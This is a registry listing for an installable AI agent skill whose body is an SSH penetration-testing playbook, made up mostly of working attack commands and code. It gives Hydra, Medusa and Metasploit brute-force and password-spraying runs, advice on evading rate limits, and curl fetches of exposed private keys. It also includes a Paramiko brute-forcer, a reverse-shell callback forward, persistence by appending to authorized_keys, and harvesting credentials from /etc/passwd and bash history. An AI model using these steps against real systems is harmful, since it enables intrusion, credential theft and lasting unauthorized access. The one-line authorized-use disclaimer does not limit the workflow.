{"id":"ff25f85a-5561-4ca8-a733-5819194efd45","shortId":"g5WJ7M","kind":"skill","title":"ssh-penetration-testing","tagline":"Conduct comprehensive SSH security assessments including enumeration, credential attacks, vulnerability exploitation, tunneling techniques, and post-exploitation activities. This skill covers the complete methodology for testing SSH service security.","description":"> AUTHORIZED USE ONLY: Use this skill only for authorized security assessments, defensive validation, or controlled educational environments.\n\n# SSH Penetration Testing\n\n## Purpose\n\nConduct comprehensive SSH security assessments including enumeration, credential attacks, vulnerability exploitation, tunneling techniques, and post-exploitation activities. This skill covers the complete methodology for testing SSH service security.\n\n## Prerequisites\n\n### Required Tools\n- Nmap with SSH scripts\n- Hydra or Medusa for brute-forcing\n- ssh-audit for configuration analysis\n- Metasploit Framework\n- Python with Paramiko library\n\n### Required Knowledge\n- SSH protocol fundamentals\n- Public/private key authentication\n- Port forwarding concepts\n- Linux command-line proficiency\n\n## Outputs and Deliverables\n\n1. **SSH Enumeration Report** - Versions, algorithms, configurations\n2. **Credential Assessment** - Weak passwords, default credentials\n3. **Vulnerability Assessment** - Known CVEs, misconfigurations\n4. **Tunnel Documentation** - Port forwarding configurations\n\n## Core Workflow\n\n### Phase 1: SSH Service Discovery\n\nIdentify SSH services on target networks:\n\n```bash\n# Quick SSH port scan\nnmap -p 22 192.168.1.0/24 --open\n\n# Common alternate SSH ports\nnmap -p 22,2222,22222,2200 192.168.1.100\n\n# Full port scan for SSH\nnmap -p- --open 192.168.1.100 | grep -i ssh\n\n# Service version detection\nnmap -sV -p 22 192.168.1.100\n```\n\n### Phase 2: SSH Enumeration\n\nGather detailed information about SSH services:\n\n```bash\n# Banner grabbing\nnc 192.168.1.100 22\n# Output: SSH-2.0-OpenSSH_8.4p1 Debian-5\n\n# Telnet banner grab\ntelnet 192.168.1.100 22\n\n# Nmap version detection with scripts\nnmap -sV -p 22 --script ssh-hostkey 192.168.1.100\n\n# Enumerate supported algorithms\nnmap -p 22 --script ssh2-enum-algos 192.168.1.100\n\n# Get host keys\nnmap -p 22 --script ssh-hostkey --script-args ssh_hostkey=full 192.168.1.100\n\n# Check authentication methods\nnmap -p 22 --script ssh-auth-methods --script-args=\"ssh.user=root\" 192.168.1.100\n```\n\n### Phase 3: SSH Configuration Auditing\n\nIdentify weak configurations:\n\n```bash\n# ssh-audit - comprehensive SSH audit\nssh-audit 192.168.1.100\n\n# ssh-audit with specific port\nssh-audit -p 2222 192.168.1.100\n\n# Output includes:\n# - Algorithm recommendations\n# - Security vulnerabilities\n# - Hardening suggestions\n```\n\nKey configuration weaknesses to identify:\n- Weak key exchange algorithms (diffie-hellman-group1-sha1)\n- Weak ciphers (arcfour, 3des-cbc)\n- Weak MACs (hmac-md5, hmac-sha1-96)\n- Deprecated protocol versions\n\n### Phase 4: Credential Attacks\n\n#### Brute-Force with Hydra\n\n```bash\n# Single username, password list\nhydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.100\n\n# Username list, single password\nhydra -L users.txt -p Password123 ssh://192.168.1.100\n\n# Username and password lists\nhydra -L users.txt -P passwords.txt ssh://192.168.1.100\n\n# With specific port\nhydra -l admin -P passwords.txt -s 2222 ssh://192.168.1.100\n\n# Rate limiting evasion (slow)\nhydra -l admin -P passwords.txt -t 1 -w 5 ssh://192.168.1.100\n\n# Verbose output\nhydra -l admin -P passwords.txt -vV ssh://192.168.1.100\n\n# Exit on first success\nhydra -l admin -P passwords.txt -f ssh://192.168.1.100\n```\n\n#### Brute-Force with Medusa\n\n```bash\n# Basic brute-force\nmedusa -h 192.168.1.100 -u admin -P passwords.txt -M ssh\n\n# Multiple targets\nmedusa -H targets.txt -u admin -P passwords.txt -M ssh\n\n# With username list\nmedusa -h 192.168.1.100 -U users.txt -P passwords.txt -M ssh\n\n# Specific port\nmedusa -h 192.168.1.100 -u admin -P passwords.txt -M ssh -n 2222\n```\n\n#### Password Spraying\n\n```bash\n# Test common password across users\nhydra -L users.txt -p Summer2024! ssh://192.168.1.100\n\n# Multiple common passwords\nfor pass in \"Password123\" \"Welcome1\" \"Summer2024!\"; do\n    hydra -L users.txt -p \"$pass\" ssh://192.168.1.100\ndone\n```\n\n### Phase 5: Key-Based Authentication Testing\n\nTest for weak or exposed keys:\n\n```bash\n# Attempt login with found private key\nssh -i id_rsa user@192.168.1.100\n\n# Specify key explicitly (bypass agent)\nssh -o IdentitiesOnly=yes -i id_rsa user@192.168.1.100\n\n# Force password authentication\nssh -o PreferredAuthentications=password user@192.168.1.100\n\n# Try common key names\nfor key in id_rsa id_dsa id_ecdsa id_ed25519; do\n    ssh -i \"$key\" user@192.168.1.100\ndone\n```\n\nCheck for exposed keys:\n\n```bash\n# Common locations for private keys\n~/.ssh/id_rsa\n~/.ssh/id_dsa\n~/.ssh/id_ecdsa\n~/.ssh/id_ed25519\n/etc/ssh/ssh_host_*_key\n/root/.ssh/\n/home/*/.ssh/\n\n# Web-accessible keys (check with curl/wget)\ncurl -s http://target.com/.ssh/id_rsa\ncurl -s http://target.com/id_rsa\ncurl -s http://target.com/backup/ssh_keys.tar.gz\n```\n\n### Phase 6: Vulnerability Exploitation\n\nSearch for known vulnerabilities:\n\n```bash\n# Search for exploits\nsearchsploit openssh\nsearchsploit openssh 7.2\n\n# Common SSH vulnerabilities\n# CVE-2018-15473 - Username enumeration\n# CVE-2016-0777 - Roaming vulnerability\n# CVE-2016-0778 - Buffer overflow\n\n# Metasploit enumeration\nmsfconsole\nuse auxiliary/scanner/ssh/ssh_version\nset RHOSTS 192.168.1.100\nrun\n\n# Username enumeration (CVE-2018-15473)\nuse auxiliary/scanner/ssh/ssh_enumusers\nset RHOSTS 192.168.1.100\nset USER_FILE /usr/share/wordlists/users.txt\nrun\n```\n\n### Phase 7: SSH Tunneling and Port Forwarding\n\n#### Local Port Forwarding\n\nForward local port to remote service:\n\n```bash\n# Syntax: ssh -L <local_port>:<remote_host>:<remote_port> user@ssh_server\n\n# Access internal web server through SSH\nssh -L 8080:192.168.1.50:80 user@192.168.1.100\n# Now access http://localhost:8080\n\n# Access internal database\nssh -L 3306:192.168.1.50:3306 user@192.168.1.100\n\n# Multiple forwards\nssh -L 8080:192.168.1.50:80 -L 3306:192.168.1.51:3306 user@192.168.1.100\n```\n\n#### Remote Port Forwarding\n\nExpose local service to remote network:\n\n```bash\n# Syntax: ssh -R <remote_port>:<local_host>:<local_port> user@ssh_server\n\n# Expose local web server to remote\nssh -R 8080:localhost:80 user@192.168.1.100\n# Remote can access via localhost:8080\n\n# Reverse shell callback\nssh -R 4444:localhost:4444 user@192.168.1.100\n```\n\n#### Dynamic Port Forwarding (SOCKS Proxy)\n\nCreate SOCKS proxy for network pivoting:\n\n```bash\n# Create SOCKS proxy on local port 1080\nssh -D 1080 user@192.168.1.100\n\n# Use with proxychains\necho \"socks5 127.0.0.1 1080\" >> /etc/proxychains.conf\nproxychains nmap -sT -Pn 192.168.1.0/24\n\n# Browser configuration\n# Set SOCKS proxy to localhost:1080\n```\n\n#### ProxyJump (Jump Hosts)\n\nChain through multiple SSH servers:\n\n```bash\n# Jump through intermediate host\nssh -J user1@jump_host user2@target_host\n\n# Multiple jumps\nssh -J user1@jump1,user2@jump2 user3@target\n\n# With SSH config\n# ~/.ssh/config\nHost target\n    HostName 192.168.2.50\n    User admin\n    ProxyJump user@192.168.1.100\n```\n\n### Phase 8: Post-Exploitation\n\nActivities after gaining SSH access:\n\n```bash\n# Check sudo privileges\nsudo -l\n\n# Find SSH keys\nfind / -name \"id_rsa\" 2>/dev/null\nfind / -name \"id_dsa\" 2>/dev/null\nfind / -name \"authorized_keys\" 2>/dev/null\n\n# Check SSH directory\nls -la ~/.ssh/\ncat ~/.ssh/known_hosts\ncat ~/.ssh/authorized_keys\n\n# Add persistence (add your key)\necho \"ssh-rsa AAAAB3...\" >> ~/.ssh/authorized_keys\n\n# Extract SSH configuration\ncat /etc/ssh/sshd_config\n\n# Find other users\ncat /etc/passwd | grep -v nologin\nls /home/\n\n# History for credentials\ncat ~/.bash_history | grep -i ssh\ncat ~/.bash_history | grep -i pass\n```\n\n### Phase 9: Custom SSH Scripts with Paramiko\n\nPython-based SSH automation:\n\n```python\n#!/usr/bin/env python3\nimport paramiko\nimport sys\n\ndef ssh_connect(host, username, password):\n    \"\"\"Attempt SSH connection with credentials\"\"\"\n    client = paramiko.SSHClient()\n    client.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n    \n    try:\n        client.connect(host, username=username, password=password, timeout=5)\n        print(f\"[+] Success: {username}:{password}\")\n        return client\n    except paramiko.AuthenticationException:\n        print(f\"[-] Failed: {username}:{password}\")\n        return None\n    except Exception as e:\n        print(f\"[!] Error: {e}\")\n        return None\n\ndef execute_command(client, command):\n    \"\"\"Execute command via SSH\"\"\"\n    stdin, stdout, stderr = client.exec_command(command)\n    output = stdout.read().decode()\n    errors = stderr.read().decode()\n    return output, errors\n\ndef ssh_brute_force(host, username, wordlist):\n    \"\"\"Brute-force SSH with wordlist\"\"\"\n    with open(wordlist, 'r') as f:\n        passwords = f.read().splitlines()\n    \n    for password in passwords:\n        client = ssh_connect(host, username, password.strip())\n        if client:\n            # Run post-exploitation commands\n            output, _ = execute_command(client, 'id; uname -a')\n            print(output)\n            client.close()\n            return True\n    return False\n\n# Usage\nif __name__ == \"__main__\":\n    target = \"192.168.1.100\"\n    user = \"admin\"\n    \n    # Single credential test\n    client = ssh_connect(target, user, \"password123\")\n    if client:\n        output, _ = execute_command(client, \"ls -la\")\n        print(output)\n        client.close()\n```\n\n### Phase 10: Metasploit SSH Modules\n\nUse Metasploit for comprehensive SSH testing:\n\n```bash\n# Start Metasploit\nmsfconsole\n\n# SSH Version Scanner\nuse auxiliary/scanner/ssh/ssh_version\nset RHOSTS 192.168.1.0/24\nrun\n\n# SSH Login Brute-Force\nuse auxiliary/scanner/ssh/ssh_login\nset RHOSTS 192.168.1.100\nset USERNAME admin\nset PASS_FILE /usr/share/wordlists/rockyou.txt\nset VERBOSE true\nrun\n\n# SSH Key Login\nuse auxiliary/scanner/ssh/ssh_login_pubkey\nset RHOSTS 192.168.1.100\nset USERNAME admin\nset KEY_FILE /path/to/id_rsa\nrun\n\n# Username Enumeration\nuse auxiliary/scanner/ssh/ssh_enumusers\nset RHOSTS 192.168.1.100\nset USER_FILE users.txt\nrun\n\n# Post-exploitation with SSH session\nsessions -i 1\n```\n\n## Quick Reference\n\n### SSH Enumeration Commands\n\n| Command | Purpose |\n|---------|---------|\n| `nc <host> 22` | Banner grabbing |\n| `ssh-audit <host>` | Configuration audit |\n| `nmap --script ssh*` | SSH NSE scripts |\n| `searchsploit openssh` | Find exploits |\n\n### Brute-Force Options\n\n| Tool | Command |\n|------|---------|\n| Hydra | `hydra -l user -P pass.txt ssh://host` |\n| Medusa | `medusa -h host -u user -P pass.txt -M ssh` |\n| Ncrack | `ncrack -p 22 --user admin -P pass.txt host` |\n| Metasploit | `use auxiliary/scanner/ssh/ssh_login` |\n\n### Port Forwarding Types\n\n| Type | Command | Use Case |\n|------|---------|----------|\n| Local | `-L 8080:target:80` | Access remote services locally |\n| Remote | `-R 8080:localhost:80` | Expose local services remotely |\n| Dynamic | `-D 1080` | SOCKS proxy for pivoting |\n\n### Common SSH Ports\n\n| Port | Description |\n|------|-------------|\n| 22 | Default SSH |\n| 2222 | Common alternate |\n| 22222 | Another alternate |\n| 830 | NETCONF over SSH |\n\n## Constraints and Limitations\n\n### Legal Considerations\n- Always obtain written authorization\n- Brute-forcing may violate ToS\n- Document all testing activities\n\n### Technical Limitations\n- Rate limiting may block attacks\n- Fail2ban or similar may ban IPs\n- Key-based auth prevents password attacks\n- Two-factor authentication adds complexity\n\n### Evasion Techniques\n- Use slow brute-force: `-t 1 -w 5`\n- Distribute attacks across IPs\n- Use timing-based enumeration carefully\n- Respect lockout thresholds\n\n## Troubleshooting\n\n| Issue | Solutions |\n|-------|-----------|\n| Connection Refused | Verify SSH running; check firewall; confirm port; test from different IP |\n| Authentication Failures | Verify username; check password policy; key permissions (600); authorized_keys format |\n| Tunnel Not Working | Check GatewayPorts/AllowTcpForwarding in sshd_config; verify firewall; use `ssh -v` |\n\n## When to Use\nThis skill is applicable to execute the workflow or actions described in the overview.","tags":["ssh","penetration","testing","antigravity","awesome","skills","sickn33","agent-skills","agentic-skills","ai-agent-skills","ai-agents","ai-coding"],"capabilities":["skill","source-sickn33","skill-ssh-penetration-testing","topic-agent-skills","topic-agentic-skills","topic-ai-agent-skills","topic-ai-agents","topic-ai-coding","topic-ai-workflows","topic-antigravity","topic-antigravity-skills","topic-claude-code","topic-claude-code-skills","topic-codex-cli","topic-codex-skills"],"categories":["antigravity-awesome-skills"],"synonyms":[],"warnings":[],"endpointUrl":"https://skills.sh/sickn33/antigravity-awesome-skills/ssh-penetration-testing","protocol":"skill","transport":"skills-sh","auth":{"type":"none","details":{"cli":"npx skills add sickn33/antigravity-awesome-skills","source_repo":"https://github.com/sickn33/antigravity-awesome-skills","install_from":"skills.sh"}},"qualityScore":"0.700","qualityRationale":"deterministic score 0.70 from registry signals: · indexed on github topic:agent-skills · 34515 github stars · SKILL.md body (11,789 chars)","verified":false,"liveness":"unknown","lastLivenessCheck":null,"agentReviews":{"count":0,"score_avg":null,"cost_usd_avg":null,"success_rate":null,"latency_p50_ms":null,"narrative_summary":null,"summary_updated_at":null},"enrichmentModel":"deterministic:skill-github:v1","enrichmentVersion":1,"enrichedAt":"2026-04-22T12:51:49.726Z","embedding":null,"createdAt":"2026-04-18T21:45:24.838Z","updatedAt":"2026-04-22T12:51:49.726Z","lastSeenAt":"2026-04-22T12:51:49.726Z","tsv":"'-0777':681 '-0778':686 '-15473':676,702 '-2.0':228 '-2016':680,685 '-2018':675,701 '-5':233 '/.bash_history':988,993 '/.ssh':631,953 '/.ssh/authorized_keys':957,968 '/.ssh/config':901 '/.ssh/id_dsa':624 '/.ssh/id_ecdsa':625 '/.ssh/id_ed25519':626 '/.ssh/id_rsa':623,643 '/.ssh/known_hosts':955 '/24':177,858,1198 '/backup/ssh_keys.tar.gz':653 '/dev/null':935,941,947 '/etc/passwd':978 '/etc/proxychains.conf':852 '/etc/ssh/ssh_host_':627 '/etc/ssh/sshd_config':973 '/home':630,983 '/id_rsa':648 '/path/to/id_rsa':1235 '/root/.ssh':629 '/usr/bin/env':1010 '/usr/share/wordlists/rockyou.txt':389,1216 '/usr/share/wordlists/users.txt':711 '1':129,158,432,1257,1422 '10':1176 '1080':839,842,851,866,1346 '127.0.0.1':850 '192.168.1.0':176,857,1197 '192.168.1.100':189,198,209,224,238,253,265,282,299,318,330,390,400,410,421,435,444,455,468,491,502,524,540,567,581,590,611,696,707,748,762,775,804,820,844,910,1152,1209,1228,1243 '192.168.1.50':745,759,768 '192.168.1.51':772 '192.168.2.50':905 '2':136,211,934,940,946 '22':175,185,208,225,239,248,259,271,288,1266,1310,1356 '2200':188 '2222':186,329,420,510,1359 '22222':187,1362 '3':143,301 '3306':758,760,771,773 '3des':357 '3des-cbc':356 '4':149,372 '4444':816,818 '5':434,543,1043,1424 '6':655 '600':1463 '7':714 '7.2':670 '8':912 '8.4':230 '80':746,769,802,1330,1339 '8080':744,752,767,800,810,1328,1337 '830':1365 '9':998 '96':367 'aaaab3':967 'access':634,736,750,753,807,920,1331 'across':517,1427 'action':1492 'activ':22,72,916,1387 'add':958,960,1412 'admin':387,416,428,440,451,470,481,504,907,1154,1212,1231,1312 'agent':572 'algo':264 'algorithm':134,256,333,347 'altern':180,1361,1364 'alway':1374 'analysi':103 'anoth':1363 'applic':1486 'arcfour':355 'arg':278,296 'assess':9,44,59,138,145 'attack':13,63,374,1394,1407,1426 'attempt':556,1022 'audit':100,304,311,314,317,321,327,1271,1273 'auth':292,1404 'authent':117,284,547,584,1411,1454 'author':34,42,944,1377,1464 'autom':1008 'auxiliary/scanner/ssh/ssh_enumusers':704,1240 'auxiliary/scanner/ssh/ssh_login':1206,1318 'auxiliary/scanner/ssh/ssh_login_pubkey':1225 'auxiliary/scanner/ssh/ssh_version':693,1194 'ban':1399 'banner':221,235,1267 'base':546,1006,1403,1432 'bash':168,220,308,380,461,513,555,617,662,729,785,832,875,921,1186 'basic':462 'block':1393 'browser':859 'brute':96,376,457,464,1096,1102,1203,1285,1379,1419 'brute-forc':95,375,456,463,1101,1202,1284,1378,1418 'buffer':687 'bypass':571 'callback':813 'care':1434 'case':1325 'cat':954,956,972,977,987,992 'cbc':358 'chain':870 'check':283,613,636,922,948,1446,1458,1470 'cipher':354 'client':1027,1050,1073,1120,1127,1136,1158,1165,1169 'client.close':1142,1174 'client.connect':1036 'client.exec':1082 'client.set':1029 'command':123,1072,1074,1076,1083,1084,1132,1135,1168,1262,1263,1289,1323 'command-lin':122 'common':179,515,526,592,618,671,1351,1360 'complet':27,77 'complex':1413 'comprehens':6,56,312,1183 'concept':120 'conduct':5,55 'config':900,1474 'configur':102,135,154,303,307,340,860,971,1272 'confirm':1448 'connect':1018,1024,1122,1160,1441 'consider':1373 'constraint':1369 'control':48 'core':155 'cover':25,75 'creat':826,833 'credenti':12,62,137,142,373,986,1026,1156 'curl':639,644,649 'curl/wget':638 'custom':999 'cve':674,679,684,700 'cves':147 'd':841,1345 'databas':755 'debian':232 'decod':1087,1090 'def':1016,1070,1094 'default':141,1357 'defens':45 'deliver':128 'deprec':368 'describ':1493 'descript':1355 'detail':215 'detect':204,242 'differ':1452 'diffi':349 'diffie-hellman-group1-sha1':348 'directori':950 'discoveri':161 'distribut':1425 'document':151,1384 'done':541,612 'dsa':601,939 'dynam':821,1344 'e':1063,1067 'ecdsa':603 'echo':848,963 'ed25519':605 'educ':49 'enum':263 'enumer':11,61,131,213,254,678,690,699,1238,1261,1433 'environ':50 'error':1066,1088,1093 'evas':424,1414 'except':1051,1060,1061 'exchang':346 'execut':1071,1075,1134,1167,1488 'exit':445 'explicit':570 'exploit':15,21,65,71,657,665,915,1131,1251,1283 'expos':553,615,779,792,1340 'extract':969 'f':454,1045,1054,1065,1112 'f.read':1114 'factor':1410 'fail':1055 'fail2ban':1395 'failur':1455 'fals':1146 'file':710,1215,1234,1246 'find':927,930,936,942,974,1282 'firewal':1447,1476 'first':447 'forc':97,377,458,465,582,1097,1103,1204,1286,1380,1420 'format':1466 'forward':119,153,719,722,723,764,778,823,1320 'found':559 'framework':105 'full':190,281 'fundament':114 'gain':918 'gatewayports/allowtcpforwarding':1471 'gather':214 'get':266 'grab':222,236,1268 'grep':199,979,989,994 'group1':351 'h':467,478,490,501,1299 'harden':337 'hellman':350 'histori':984 'hmac':362,365 'hmac-md5':361 'hmac-sha1':364 'host':267,869,879,884,887,902,1019,1031,1037,1098,1123,1296,1300,1315 'hostkey':252,275,280 'hostnam':904 'hydra':91,379,385,395,405,414,426,438,449,519,535,1290,1291 'id':564,578,598,600,602,604,932,938,1137 'identifi':162,305,343 'identitieson':575 'import':1012,1014 'includ':10,60,332 'inform':216 'intermedi':878 'intern':737,754 'ip':1400,1428,1453 'issu':1439 'j':881,891 'jump':868,876,883,889 'jump1':893 'jump2':895 'key':116,268,339,345,545,554,561,569,593,596,609,616,622,628,635,929,945,962,1032,1222,1233,1402,1461,1465 'key-bas':544,1401 'knowledg':111 'known':146,660 'l':386,396,406,415,427,439,450,520,536,732,743,757,766,770,926,1292,1327 'la':952,1171 'legal':1372 'librari':109 'limit':423,1371,1389,1391 'line':124 'linux':121 'list':384,392,404,488 'local':720,724,780,793,837,1326,1334,1341 'localhost':751,801,809,817,865,1338 'locat':619 'lockout':1436 'login':557,1201,1223 'ls':951,982,1170 'm':473,484,496,507,1305 'mac':360 'main':1150 'may':1381,1392,1398 'md5':363 'medusa':93,460,466,477,489,500,1297,1298 'metasploit':104,689,1177,1181,1188,1316 'method':285,293 'methodolog':28,78 'misconfigur':148 'miss':1030 'modul':1179 'msfconsol':691,1189 'multipl':475,525,763,872,888 'n':509 'name':594,931,937,943,1149 'nc':223,1265 'ncrack':1307,1308 'netconf':1366 'network':167,784,830 'nmap':87,173,183,195,205,240,245,257,269,286,854,1274 'nologin':981 'none':1059,1069 'nse':1278 'o':574,586 'obtain':1375 'open':178,197,1108 'openssh':229,667,669,1281 'option':1287 'output':126,226,331,437,1085,1092,1133,1141,1166,1173 'overflow':688 'overview':1496 'p':174,184,196,207,247,258,270,287,328,388,398,408,417,429,441,452,471,482,494,505,522,538,1294,1303,1309,1313 'p1':231 'paramiko':108,1003,1013 'paramiko.authenticationexception':1052 'paramiko.autoaddpolicy':1034 'paramiko.sshclient':1028 'pass':529,539,996,1214 'pass.txt':1295,1304,1314 'password':140,383,394,403,511,516,527,583,588,1021,1040,1041,1048,1057,1113,1117,1119,1406,1459 'password.strip':1125 'password123':399,531,1163 'passwords.txt':409,418,430,442,453,472,483,495,506 'penetr':3,52 'permiss':1462 'persist':959 'phase':157,210,300,371,542,654,713,911,997,1175 'pivot':831,1350 'pn':856 'polici':1033,1460 'port':118,152,171,182,191,324,413,499,718,721,725,777,822,838,1319,1353,1354,1449 'post':20,70,914,1130,1250 'post-exploit':19,69,913,1129,1249 'preferredauthent':587 'prerequisit':84 'prevent':1405 'print':1044,1053,1064,1140,1172 'privat':560,621 'privileg':924 'profici':125 'protocol':113,369 'proxi':825,828,835,863,1348 'proxychain':847,853 'proxyjump':867,908 'public/private':115 'purpos':54,1264 'python':106,1005,1009 'python-bas':1004 'python3':1011 'quick':169,1258 'r':788,799,815,1110,1336 'rate':422,1390 'recommend':334 'refer':1259 'refus':1442 'remot':727,776,783,797,805,1332,1335,1343 'report':132 'requir':85,110 'respect':1435 'return':1049,1058,1068,1091,1143,1145 'revers':811 'rhost':695,706,1196,1208,1227,1242 'roam':682 'root':298 'rsa':565,579,599,933,966 'run':697,712,1128,1199,1220,1236,1248,1445 'scan':172,192 'scanner':1192 'script':90,244,249,260,272,277,289,295,1001,1275,1279 'script-arg':276,294 'search':658,663 'searchsploit':666,668,1280 'secur':8,33,43,58,83,335 'server':735,739,791,795,874 'servic':32,82,160,164,202,219,728,781,1333,1342 'session':1254,1255 'set':694,705,708,861,1195,1207,1210,1213,1217,1226,1229,1232,1241,1244 'sha1':352,366 'shell':812 'similar':1397 'singl':381,393,1155 'skill':24,39,74,1484 'skill-ssh-penetration-testing' 'slow':425,1417 'sock':824,827,834,862,1347 'socks5':849 'solut':1440 'source-sickn33' 'specif':323,412,498 'specifi':568 'splitlin':1115 'spray':512 'ssh':2,7,31,51,57,81,89,99,112,130,159,163,170,181,194,201,212,218,227,251,274,279,291,302,310,313,316,320,326,474,485,497,508,562,573,585,607,672,715,731,734,741,742,756,765,787,790,798,814,840,873,880,890,899,919,928,949,965,970,991,1000,1007,1017,1023,1078,1095,1104,1121,1159,1178,1184,1190,1200,1221,1253,1260,1270,1276,1277,1306,1352,1358,1368,1444,1478 'ssh-audit':98,309,315,319,325,1269 'ssh-auth-method':290 'ssh-hostkey':250,273 'ssh-penetration-test':1 'ssh-rsa':964 'ssh.user':297 'ssh2':262 'ssh2-enum-algos':261 'sshd':1473 'st':855 'start':1187 'stderr':1081 'stderr.read':1089 'stdin':1079 'stdout':1080 'stdout.read':1086 'success':448,1046 'sudo':923,925 'suggest':338 'summer2024':523,533 'support':255 'sv':206,246 'syntax':730,786 'sys':1015 'target':166,476,886,897,903,1151,1161,1329 'target.com':642,647,652 'target.com/.ssh/id_rsa':641 'target.com/backup/ssh_keys.tar.gz':651 'target.com/id_rsa':646 'targets.txt':479 'technic':1388 'techniqu':17,67,1415 'telnet':234,237 'test':4,30,53,80,514,548,549,1157,1185,1386,1450 'threshold':1437 'time':1431 'timeout':1042 'timing-bas':1430 'tool':86,1288 'topic-agent-skills' 'topic-agentic-skills' 'topic-ai-agent-skills' 'topic-ai-agents' 'topic-ai-coding' 'topic-ai-workflows' 'topic-antigravity' 'topic-antigravity-skills' 'topic-claude-code' 'topic-claude-code-skills' 'topic-codex-cli' 'topic-codex-skills' 'tos':1383 'tri':591,1035 'troubleshoot':1438 'true':1144,1219 'tunnel':16,66,150,716,1467 'two':1409 'two-factor':1408 'type':1321,1322 'u':469,480,492,503,1301 'unam':1138 'usag':1147 'use':35,37,692,703,845,1180,1193,1205,1224,1239,1317,1324,1416,1429,1477,1482 'user':518,566,580,589,610,709,733,747,761,774,789,803,819,843,906,909,976,1153,1162,1245,1293,1302,1311 'user1':882,892 'user2':885,894 'user3':896 'usernam':382,391,401,487,677,698,1020,1038,1039,1047,1056,1099,1124,1211,1230,1237,1457 'users.txt':397,407,493,521,537,1247 'v':980,1479 'valid':46 'verbos':436,1218 'verifi':1443,1456,1475 'version':133,203,241,370,1191 'via':808,1077 'violat':1382 'vulner':14,64,144,336,656,661,673,683 'vv':443 'w':433,1423 'weak':139,306,341,344,353,359,551 'web':633,738,794 'web-access':632 'welcome1':532 'wordlist':1100,1106,1109 'work':1469 'workflow':156,1490 'written':1376 'yes':576","prices":[{"id":"dea17d5a-1f5a-4977-bb08-3913b211b751","listingId":"ff25f85a-5561-4ca8-a733-5819194efd45","amountUsd":"0","unit":"free","nativeCurrency":null,"nativeAmount":null,"chain":null,"payTo":null,"paymentMethod":"skill-free","isPrimary":true,"details":{"org":"sickn33","category":"antigravity-awesome-skills","install_from":"skills.sh"},"createdAt":"2026-04-18T21:45:24.838Z"}],"sources":[{"listingId":"ff25f85a-5561-4ca8-a733-5819194efd45","source":"github","sourceId":"sickn33/antigravity-awesome-skills/ssh-penetration-testing","sourceUrl":"https://github.com/sickn33/antigravity-awesome-skills/tree/main/skills/ssh-penetration-testing","isPrimary":false,"firstSeenAt":"2026-04-18T21:45:24.838Z","lastSeenAt":"2026-04-22T12:51:49.726Z"}],"details":{"listingId":"ff25f85a-5561-4ca8-a733-5819194efd45","quickStartSnippet":null,"exampleRequest":null,"exampleResponse":null,"schema":null,"openapiUrl":null,"agentsTxtUrl":null,"citations":[],"useCases":[],"bestFor":[],"notFor":[],"kindDetails":{"org":"sickn33","slug":"ssh-penetration-testing","github":{"repo":"sickn33/antigravity-awesome-skills","stars":34515,"topics":["agent-skills","agentic-skills","ai-agent-skills","ai-agents","ai-coding","ai-workflows","antigravity","antigravity-skills","claude-code","claude-code-skills","codex-cli","codex-skills","cursor","cursor-skills","developer-tools","gemini-cli","gemini-skills","kiro","mcp","skill-library"],"license":"mit","html_url":"https://github.com/sickn33/antigravity-awesome-skills","pushed_at":"2026-04-22T06:40:00Z","description":"Installable GitHub library of 1,400+ agentic skills for Claude Code, Cursor, Codex CLI, Gemini CLI, Antigravity, and more. Includes installer CLI, bundles, workflows, and official/community skill collections.","skill_md_sha":"44da26dc56f4e954b690312a1bcbd1a1f5ab8e12","skill_md_path":"skills/ssh-penetration-testing/SKILL.md","default_branch":"main","skill_tree_url":"https://github.com/sickn33/antigravity-awesome-skills/tree/main/skills/ssh-penetration-testing"},"layout":"multi","source":"github","category":"antigravity-awesome-skills","frontmatter":{"name":"ssh-penetration-testing","description":"Conduct comprehensive SSH security assessments including enumeration, credential attacks, vulnerability exploitation, tunneling techniques, and post-exploitation activities. This skill covers the complete methodology for testing SSH service security."},"skills_sh_url":"https://skills.sh/sickn33/antigravity-awesome-skills/ssh-penetration-testing"},"updatedAt":"2026-04-22T12:51:49.726Z"}}